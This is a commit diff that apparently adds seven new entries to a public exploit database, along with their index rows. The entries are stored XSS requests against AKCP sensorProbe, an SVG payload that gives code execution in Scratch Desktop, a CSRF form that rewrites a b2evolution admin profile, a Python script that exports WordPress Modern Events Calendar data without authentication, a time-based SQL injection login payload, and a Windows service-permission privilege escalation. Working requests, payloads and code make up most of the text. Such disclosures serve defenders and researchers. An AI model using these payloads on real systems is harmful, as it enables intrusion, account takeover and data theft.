DB: 2021-07-03
7 changes to exploits/shellcodes WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
This commit is contained in:
parent
4f3cf46cbf
commit
5bd61e68a2
8 changed files with 530 additions and 0 deletions
67
exploits/hardware/webapps/50080.txt
Normal file
67
exploits/hardware/webapps/50080.txt
Normal file
|
@ -0,0 +1,67 @@
|
||||||
|
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
|
||||||
|
# Date: 07-01-2021
|
||||||
|
# Exploit Author: Tyler Butler
|
||||||
|
# Vendor Homepage: https://www.akcp.com/
|
||||||
|
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
|
||||||
|
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
|
||||||
|
# Version: < SP480-20210624
|
||||||
|
# CVE: CVE-2021-35956
|
||||||
|
|
||||||
|
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
|
||||||
|
|
||||||
|
|
||||||
|
1) Stored Cross-Site Scripting via System Settings
|
||||||
|
|
||||||
|
POST /system?time=32e004c941f912 HTTP/1.1
|
||||||
|
Host: [target]
|
||||||
|
Content-Length: 114
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://[target]
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://[target]/system?time=32e004c941f912
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
|
||||||
|
|
||||||
|
2) Stored Cross-Site Scripting via Email Settings
|
||||||
|
|
||||||
|
POST /mail?time=32e004c941f912 HTTP/1.1
|
||||||
|
Host: [target]
|
||||||
|
Content-Length: 162
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://[target]
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://[target]/mail?time=32e004c941f912
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
|
||||||
|
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
|
||||||
|
|
||||||
|
3) Stored Cross-Site Scripting via Sensor Description
|
||||||
|
|
||||||
|
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
|
||||||
|
Host: [target]
|
||||||
|
Content-Length: 55
|
||||||
|
Cache-Control: max-age=0
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Origin: http://[target]
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: CPCookie=sensors=400
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
|
39
exploits/multiple/webapps/50079.txt
Normal file
39
exploits/multiple/webapps/50079.txt
Normal file
|
@ -0,0 +1,39 @@
|
||||||
|
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
|
||||||
|
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
|
||||||
|
# Date: 2021-06-18
|
||||||
|
# Exploit Author: Stig Magnus Baugstø
|
||||||
|
# Vendor Homepage: https://scratch.mit.edu/
|
||||||
|
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
|
||||||
|
# Version: 3.10.2
|
||||||
|
# Tested on: Windows 10 x64, but should be platform independent.
|
||||||
|
# CVE: CVE-2020-7750
|
||||||
|
|
||||||
|
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
|
||||||
|
|
||||||
|
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
|
||||||
|
|
||||||
|
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
|
||||||
|
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
|
||||||
|
</svg>
|
||||||
|
|
||||||
|
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
|
||||||
|
|
||||||
|
Example of regular cross-site scripting (XSS):
|
||||||
|
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
|
||||||
|
</svg>
|
||||||
|
|
||||||
|
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
|
||||||
|
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||||
|
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
|
||||||
|
</svg>
|
||||||
|
|
||||||
|
The example above launches cmd.exe (Command Prompt) on Windows.
|
||||||
|
|
||||||
|
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
|
||||||
|
|
||||||
|
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
|
88
exploits/php/webapps/50081.txt
Normal file
88
exploits/php/webapps/50081.txt
Normal file
|
@ -0,0 +1,88 @@
|
||||||
|
# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
|
||||||
|
# Exploit Author: Alperen Ergel (@alpernae)
|
||||||
|
# Vendor Homepage: https://b2evolution.net/
|
||||||
|
# Software Link: https://b2evolution.net/downloads/7-2-2
|
||||||
|
# Version : 7.2.2
|
||||||
|
# Tested on: Kali Linux
|
||||||
|
# Category: WebApp
|
||||||
|
|
||||||
|
######## Description ########
|
||||||
|
|
||||||
|
Allows to attacker change admin account details.
|
||||||
|
|
||||||
|
######## Proof of Concept ########
|
||||||
|
|
||||||
|
===> REQUEST <====
|
||||||
|
|
||||||
|
POST /b2evolution/evoadm.php HTTP/1.1
|
||||||
|
Host: s2.demo.opensourcecms.com
|
||||||
|
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
|
||||||
|
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
|
||||||
|
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
|
||||||
|
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 1031
|
||||||
|
Origin: https://s2.demo.opensourcecms.com
|
||||||
|
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Te: trailers
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
## < SNIPP >
|
||||||
|
|
||||||
|
edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
|
||||||
|
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
|
||||||
|
&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
|
||||||
|
http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#### Proof-Of-Concept ####
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
|
||||||
|
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
|
||||||
|
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
|
||||||
|
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
|
||||||
|
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
|
||||||
|
<input type="hidden" name="edited_user_gender" value="M" />
|
||||||
|
<input type="hidden" name="edited_user_ctry_ID" value="233" />
|
||||||
|
<input type="hidden" name="edited_user_rgn_ID" value="" />
|
||||||
|
<input type="hidden" name="edited_user_subrg_ID" value="" />
|
||||||
|
<input type="hidden" name="edited_user_city_ID" value="" />
|
||||||
|
<input type="hidden" name="edited_user_age_min" value="" />
|
||||||
|
<input type="hidden" name="edited_user_age_max" value="" />
|
||||||
|
<input type="hidden" name="edited_user_birthday_month" value="" />
|
||||||
|
<input type="hidden" name="edited_user_birthday_day" value="" />
|
||||||
|
<input type="hidden" name="edited_user_birthday_year" value="" />
|
||||||
|
<input type="hidden" name="organizations[]" value="1" />
|
||||||
|
<input type="hidden" name="org_roles[]" value="King of Spades" />
|
||||||
|
<input type="hidden" name="org_priorities[]" value="" />
|
||||||
|
<input type="hidden" name="uf_1" value="I am the demo administrator of this site. I love having so much power!" />
|
||||||
|
<input type="hidden" name="uf_new[2][]" value="" />
|
||||||
|
<input type="hidden" name="uf_new[3][]" value="" />
|
||||||
|
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
|
||||||
|
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
|
||||||
|
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
|
||||||
|
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
|
||||||
|
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
|
||||||
|
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
|
||||||
|
<input type="hidden" name="new_field_type" value="0" />
|
||||||
|
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
|
||||||
|
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
|
||||||
|
<input type="hidden" name="ctrl" value="user" />
|
||||||
|
<input type="hidden" name="user_tab" value="profile" />
|
||||||
|
<input type="hidden" name="identity_form" value="1" />
|
||||||
|
<input type="hidden" name="user_ID" value="1" />
|
||||||
|
<input type="hidden" name="orig_user_ID" value="1" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
122
exploits/php/webapps/50082.py
Executable file
122
exploits/php/webapps/50082.py
Executable file
File diff suppressed because one or more lines are too long
69
exploits/php/webapps/50084.py
Executable file
69
exploits/php/webapps/50084.py
Executable file
|
@ -0,0 +1,69 @@
|
||||||
|
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated)
|
||||||
|
# Date 01.07.2021
|
||||||
|
# Exploit Author: Ron Jost (Hacker5preme)
|
||||||
|
# Vendor Homepage: https://webnus.net/modern-events-calendar/
|
||||||
|
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
|
||||||
|
# Version: Before 5.16.5
|
||||||
|
# Tested on: Ubuntu 18.04
|
||||||
|
# CVE: CVE-2021-24146
|
||||||
|
# CWE: CWE-863, CWE-284
|
||||||
|
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md
|
||||||
|
|
||||||
|
'''
|
||||||
|
Description:
|
||||||
|
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin,
|
||||||
|
versions before 5.16.5, did not properly restrict access to the export files,
|
||||||
|
allowing unauthenticated users to exports all events data in CSV or XML format for example.
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Banner:
|
||||||
|
'''
|
||||||
|
banner = """
|
||||||
|
_______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____
|
||||||
|
/ ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/
|
||||||
|
/ / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \
|
||||||
|
/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ /
|
||||||
|
\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/
|
||||||
|
|
||||||
|
* WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)
|
||||||
|
* @Hacker5preme
|
||||||
|
|
||||||
|
"""
|
||||||
|
print(banner)
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Import required modules:
|
||||||
|
'''
|
||||||
|
import requests
|
||||||
|
import argparse
|
||||||
|
import csv
|
||||||
|
|
||||||
|
'''
|
||||||
|
User-Input:
|
||||||
|
'''
|
||||||
|
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)')
|
||||||
|
my_parser.add_argument('-T', '--IP', type=str)
|
||||||
|
my_parser.add_argument('-P', '--PORT', type=str)
|
||||||
|
my_parser.add_argument('-U', '--PATH', type=str)
|
||||||
|
args = my_parser.parse_args()
|
||||||
|
target_ip = args.IP
|
||||||
|
target_port = args.PORT
|
||||||
|
wp_path = args.PATH
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
Exploit:
|
||||||
|
'''
|
||||||
|
print('')
|
||||||
|
print('[+] Exported Data: ')
|
||||||
|
print('')
|
||||||
|
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
|
||||||
|
answer = requests.get(exploit_url)
|
||||||
|
decoded_content = answer.content.decode('utf-8')
|
||||||
|
cr = csv.reader(decoded_content.splitlines(), delimiter=',')
|
||||||
|
my_list = list(cr)
|
||||||
|
for row in my_list:
|
||||||
|
print(row)
|
48
exploits/php/webapps/50085.txt
Normal file
48
exploits/php/webapps/50085.txt
Normal file
|
@ -0,0 +1,48 @@
|
||||||
|
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
|
||||||
|
# Exploit Author: ircashem
|
||||||
|
# Date 02.07.2021
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
|
||||||
|
# Version 1.0
|
||||||
|
# Tested on: Ubuntu 20.04
|
||||||
|
|
||||||
|
####################
|
||||||
|
# Proof of Concept #
|
||||||
|
####################
|
||||||
|
|
||||||
|
POST /login.php HTTP/1.1
|
||||||
|
Content-Length: 456
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
|
||||||
|
Origin: http://localhost
|
||||||
|
DNT: 1
|
||||||
|
Referer: http://localhost/
|
||||||
|
Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-GPC: 1
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
-----------------------------238993435340593308934076060075
|
||||||
|
Content-Disposition: form-data; name="username"
|
||||||
|
|
||||||
|
admin
|
||||||
|
-----------------------------238993435340593308934076060075
|
||||||
|
Content-Disposition: form-data; name="password"
|
||||||
|
|
||||||
|
admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
||||||
|
-----------------------------238993435340593308934076060075
|
||||||
|
Content-Disposition: form-data; name="submit"
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------238993435340593308934076060075--
|
||||||
|
|
||||||
|
###########
|
||||||
|
# Payload #
|
||||||
|
###########
|
||||||
|
|
||||||
|
username=admin
|
||||||
|
password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
|
90
exploits/windows/local/50083.txt
Normal file
90
exploits/windows/local/50083.txt
Normal file
|
@ -0,0 +1,90 @@
|
||||||
|
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
|
||||||
|
# Date: 2021-07-01
|
||||||
|
# Author: Andrea Intilangelo
|
||||||
|
# Vendor Homepage: http://nica.it - http://winwastenet.com
|
||||||
|
# Version: 1.0.6183.16475
|
||||||
|
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
|
||||||
|
|
||||||
|
WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
|
||||||
|
|
||||||
|
(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||||
|
|
||||||
|
(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.
|
||||||
|
|
||||||
|
(3) Details:
|
||||||
|
|
||||||
|
C:\Users\user>sc qc winwasteservice
|
||||||
|
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
|
||||||
|
|
||||||
|
NOME_SERVIZIO: winwasteservice
|
||||||
|
TIPO : 10 WIN32_OWN_PROCESS
|
||||||
|
TIPO_AVVIO : 2 AUTO_START
|
||||||
|
CONTROLLO_ERRORE : 1 NORMAL
|
||||||
|
NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||||
|
GRUPPO_ORDINE_CARICAMENTO :
|
||||||
|
TAG : 0
|
||||||
|
NOME_VISUALIZZATO : WinwasteService
|
||||||
|
DIPENDENZE :
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||||
|
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Users:(I)(RX)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||||
|
|
||||||
|
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||||
|
|
||||||
|
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
|
||||||
|
C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
|
||||||
|
NT AUTHORITY\SYSTEM:(ID)F
|
||||||
|
BUILTIN\Administrators:(ID)F
|
||||||
|
BUILTIN\Users:(ID)R
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||||
|
|
||||||
|
C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
|
||||||
|
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(F)
|
||||||
|
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Administrators:(I)(F)
|
||||||
|
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||||
|
BUILTIN\Users:(I)(RX)
|
||||||
|
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
|
||||||
|
|
||||||
|
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
|
||||||
|
|
||||||
|
|
||||||
|
C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\"
|
||||||
|
C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C
|
||||||
|
NT SERVICE\TrustedInstaller:(ID)F
|
||||||
|
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
|
||||||
|
NT AUTHORITY\SYSTEM:(ID)F
|
||||||
|
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
|
||||||
|
BUILTIN\Administrators:(ID)F
|
||||||
|
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
|
||||||
|
BUILTIN\Users:(ID)R
|
||||||
|
BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||||
|
GENERIC_READ
|
||||||
|
GENERIC_EXECUTE
|
||||||
|
|
||||||
|
CREATOR OWNER:(OI)(CI)(IO)(ID)F
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||||
|
GENERIC_READ
|
||||||
|
GENERIC_EXECUTE
|
||||||
|
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
|
||||||
|
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:)
|
||||||
|
GENERIC_READ
|
||||||
|
GENERIC_EXECUTE
|
|
@ -11375,6 +11375,7 @@ id,file,description,date,author,type,platform,port
|
||||||
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
|
50045,exploits/windows/local/50045.txt,"Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path",2021-06-21,"Julio Aviña",local,windows,
|
||||||
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
|
50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",2021-06-21,"Salman Asad",local,windows,
|
||||||
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
|
50048,exploits/windows/local/50048.txt,"ASUS DisplayWidget Software 3.4.0.036 - 'ASUSDisplayWidgetService' Unquoted Service Path",2021-06-22,"Julio Aviña",local,windows,
|
||||||
|
50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",2021-07-02,"Andrea Intilangelo",local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -44217,3 +44218,9 @@ id,file,description,date,author,type,platform,port
|
||||||
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
|
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",2021-07-01,"Salman Asad",webapps,php,
|
||||||
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",2021-07-01,"Ron Jost",webapps,php,
|
